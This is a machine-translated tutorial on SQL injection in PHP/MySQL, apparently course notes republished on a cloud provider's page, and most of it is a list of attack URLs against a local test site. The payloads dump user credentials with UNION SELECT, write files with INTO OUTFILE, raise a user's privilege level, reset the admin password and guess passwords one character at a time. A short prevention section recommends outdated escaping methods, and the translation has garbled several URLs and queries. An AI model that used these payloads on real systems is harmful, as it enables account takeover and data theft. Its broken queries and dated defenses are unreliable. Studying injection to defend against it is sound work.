Php SQL injection implementation (good test code security)
Source: Internet
Author: User
To learn how hackers intrude into the system, we recommend that you test the results first when writing php code. The focus of SQL injection is to construct SQL statements. Only SQL statements can be used flexibly.
Statement can be used to construct the cou injection string. After completing the course, I wrote some notes and made them ready for use at any time. I hope you have read the following content first.
The basic principle of SQL. The code in the note comes from the network.
=== Basic part ===
This table query:
Http: // 127.0.0.1/injection/user. php? Username = angel 'and LENGTH (password) = '6
Http: // 127.0.0.1/injection/user. php? Username = angel 'and LEFT (password, 1) ='m
Union statement:
Http: // 127.0.0.1/injection/show. php? Id = 1 'Union select 1, username, password from user /*
Http: // 127.0.0.1/injection/show. php? Id = 'Union select 1, username, password from user /*
Export file:
Http: // 127.0.0.1/injection/user. php? Username = angel 'into outfile' c:/file.txt
Http: // 127.0.0.1/injection/user. php? Username = 'or 1 = 1 into outfile 'C:/file.txt
Http: // 127.0.0.1/injection/show. php? Id = 'Union select 1, username, password from user into outfile 'C:/user.txt
UPDATE statement: I like this.
First understand this SQL statement
UPDATE user SET password = 'md5 ($ password) ', homepage =' $ homepage 'WHERE id =' $ ID'
If the SQL statement is modified to the following format, the injection is implemented.
1: Change the homepage value
Http://4ngel.net ', userlevel = '3
Then the SQL statement becomes
UPDATE user SET password = 'mypass', homepage = 'http: // 4ngel.net ', userlevel = '3' WHERE id =' $ ID'
Userlevel: user level
2: change the password value
Mypass) 'Where username = 'admin '#
Then the SQL statement becomes
UPDATE user SET password = 'md5 (mypass) 'WHERE username = 'admin' #)', homepage = '$ homepage' WHERE id = '$ ID'
3: Change the id value
'OR username = 'admin'
Then the SQL statement becomes
UPDATE user SET password = 'md5 ($ password) ', homepage =' $ homepage 'WHERE id = ''OR username = 'admin'
=== Advanced section ===
Common MySQL built-in functions
DATABASE ()
USER ()
SYSTEM_USER ()
SESSION_USER ()
CURRENT_USER ()
Database ()
Version ()
SUBSTRING ()
MID ()
Char ()
Load_file ()
......
Function applications
UPDATE article SET title = DATABASE () WHERE id = 1
Http: // 127.0.0.1/injection/show. php? Id =-1 union select 1, database (), version ()
SELECT * FROM user WHERE username = char (97,110,103,101,108)
# Char (97,110,103,101,108) is equivalent to angel, decimal
Http: // 127.0.0.1/injection/user. php? Userid = 1 and password = char (109,121,112, 97,115,115) http: // 127.0.0.1/injection/user. php? Userid = 1 and LEFT (password, 1)> char (100)
Http: // 127.0.0.1/injection/user. php? Userid = 1 and ord (mid (password, 111)>
Determine the number and type of fields in the data structure
Http: // 127.0.0.1/injection/show. php? Id =-1 union select 1, 1
Http: // 127.0.0.1/injection/show. php? Id =-1 union select char (97), char (97), char (97)
Guess data table name
Http: // 127.0.0.1/injection/show. php? Id =-1 union select 1, 1 from members
Obtain the user name and password from a cross-table query.
Http: // 127.0.0.1/ymdown/show. php? Id = 10000 union select 1, username, 1, password, 1 from ymdown_user where id = 1
Others
# Verify the first password
Http: // 127.0.0.1/ymdown/show. php? Id = 10 union select, 1 from ymdown_user where id = 1 and ord (mid (password )) = 49
=== Injection prevention ===
Server
Set magic_quotes_gpc to On
Display_errors is set to Off
Encoding
$ Keywords = addslashes ($ keywords );
$ Keywords = str_replace ("_", "\ _", $ keywords );
$ Keywords = str_replace ("%", "\ %", $ keywords );
Value type
Use intval () to capture and replace
String type
Single quotation marks must be added to SQL statement parameters.
The following code is used to prevent injection.
If (get_magic_quotes_gpc ()){
//....
} Else {
$ Str = mysql_real_escape_string ($ str );
$ Keywords = str_replace ("_", "\ _", $ keywords );
$ Keywords = str_replace ("%", "\ %", $ keywords );
}
Useful functions
Stripslashes ()
Get_magic_quotes_gpc ()
Mysql_real_escape_string ()
Strip_tags ()
Array_map ()
Addslashes ()
References:
Http://www.4ngel.net/article/36.htm (SQL Injection with MySQL) Chinese
Http://www.phpe.net/mysql_manual/06-4.html (MYSQL statement reference)
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.